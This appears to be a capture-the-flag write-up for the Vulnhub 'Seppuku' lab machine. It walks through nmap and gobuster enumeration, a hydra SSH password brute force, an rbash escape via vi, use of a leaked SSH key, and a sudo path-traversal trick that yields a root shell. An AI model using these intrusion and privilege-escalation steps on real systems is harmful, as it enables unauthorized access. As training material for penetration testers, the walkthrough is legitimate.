Vulnhub - Seppuku Writeup

Hi all, let’s pwn this box.

You can find the machine there > Seppuku

Let’s start as always with a nmap scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
$ ip=192.168.1.29
$ nmap -sC -sV -p- -oN nmap.txt $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-24 13:33 EEST
Nmap scan report for seppuku.zte.com.cn (192.168.1.29)
Host is up (0.00078s latency).
Not shown: 65527 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 cd:55:a8:e4:0f:28:bc:b2:a6:7d:41:76:bb:9f:71:f4 (RSA)
|   256 16:fa:29:e4:e0:8a:2e:7d:37:d2:6f:42:b2:dc:e9:22 (ECDSA)
|_  256 bb:74:e8:97:fa:30:8d:da:f9:5c:99:f0:d9:24:8a:d5 (ED25519)
80/tcp   open  http        nginx 1.14.2
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Restricted Content
|_http-server-header: nginx/1.14.2
|_http-title: 401 Authorization Required
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open  ssl/http    LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title:  404 Not Found
| ssl-cert: Subject: commonName=seppuku/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US
| Not valid before: 2020-05-13T06:51:35
|_Not valid after:  2022-08-11T06:51:35
|_ssl-date: 2020-05-24T10:33:58+00:00; +1s from scanner time.
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
7601/tcp open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Seppuku
8088/tcp open  http        LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Seppuku
MAC Address: 00:0C:29:DF:5C:E5 (VMware)
Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Let’s not waste more time, i did lot of enumeration on every port and i found a wordlist under port 7601, let’s run gobuster.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ gobuster dir -q -u http://$ip:7601/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html -o gobuster1.txt
/index.html (Status: 200)
/b (Status: 301)
/a (Status: 301)
/c (Status: 301)
/t (Status: 301)
/r (Status: 301)
/d (Status: 301)
/f (Status: 301)
/e (Status: 301)
/h (Status: 301)
/w (Status: 301)
/q (Status: 301)
/database (Status: 301)
/production (Status: 301)
/keys (Status: 301)
/secret (Status: 301)
/stg (Status: 301)

Directory /w has a wordlist in http://$ip:7601/w/password.lst, let’s download it.

After some tries, i tried to ssh brute force with user seppuku & i got in!

1
2
3
$ hydra -l seppuku -P password.lst $ip ssh
[DATA] attacking ssh://192.168.1.29:22/
[22][ssh] host: 192.168.1.29   login: seppuku   password: eeyoree

Bingo! Let’s login.

1
2
3
4
$ ssh seppuku@$ip
seppuku@192.168.1.29's password: 
seppuku@seppuku:~$ cd ..
-rbash: cd: restricted

Oh we’re into rbash!

1
2
seppuku@seppuku:~$ printenv SHELL
/bin/rbash

We can easily bypass this using vi

1
2
3
4
5
seppuku@seppuku:~$ vi
:set shell=/bin/bash
:shell
seppuku@seppuku:~$ cd ..
seppuku@seppuku:/home$ 

Perfect, now we can see into seppuku directory a password. We can try it for samurai user.

1
2
3
4
5
6
7
8
9
10
11
12
seppuku@seppuku:~$ cat .passwd
12345685213456!@!@A
seppuku@seppuku:~$ ls -la /home
total 20
drwxr-xr-x  5 root    root    4096 May 13 04:50 .
drwxr-xr-x 18 root    root    4096 May 13 00:25 ..
drwxr-xr-x  3 samurai samurai 4096 May 13 10:44 samurai
drwxr-xr-x  3 seppuku seppuku 4096 May 13 10:44 seppuku
drwxr-xr-x  5 tanto   tanto   4096 May 13 10:53 tanto
seppuku@seppuku:~$ su - samurai
Password: 
samurai@seppuku:~$ 

We’re in, if we run now sudo -l we can see this.

1
2
3
4
5
6
samurai@seppuku:~$ sudo -l
Matching Defaults entries for samurai on seppuku:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User samurai may run the following commands on seppuku:
    (ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*

But this file doesn’t exist, only tanto can create this file, after some enumeration i found tanto's ssh private key.

Note : Everytime u login as another user u have to do the vi trick to bypass rbash.

1
2
samurai@seppuku:/var/www/html/keys$ ssh -i private tanto@localhost
tanto@seppuku:~$ 

Perfect, let’s create now this file & add our payload in.

1
2
3
4
5
6
7
8
9
10
tanto@seppuku:~$ mkdir .cgi_bin
tanto@seppuku:~$ cd .cgi_bin/
tanto@seppuku:~/.cgi_bin$ touch bin
tanto@seppuku:~/.cgi_bin$ chmod 777 bin
tanto@seppuku:~/.cgi_bin$ nano bin 
tanto@seppuku:~/.cgi_bin$ cat bin
#!/bin/bash

bash
tanto@seppuku:~/.cgi_bin$ 

Let’s go back to samurai user & execute it.

1
2
samurai@seppuku:/var/www/html/keys$ sudo /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
root@seppuku:/var/www/html/keys# 

Let’s read the flag now.

1
2
root@seppuku:/var/www/html/keys# cat /root/root.txt
{SunCSR_Seppuku_2020_X}

See you!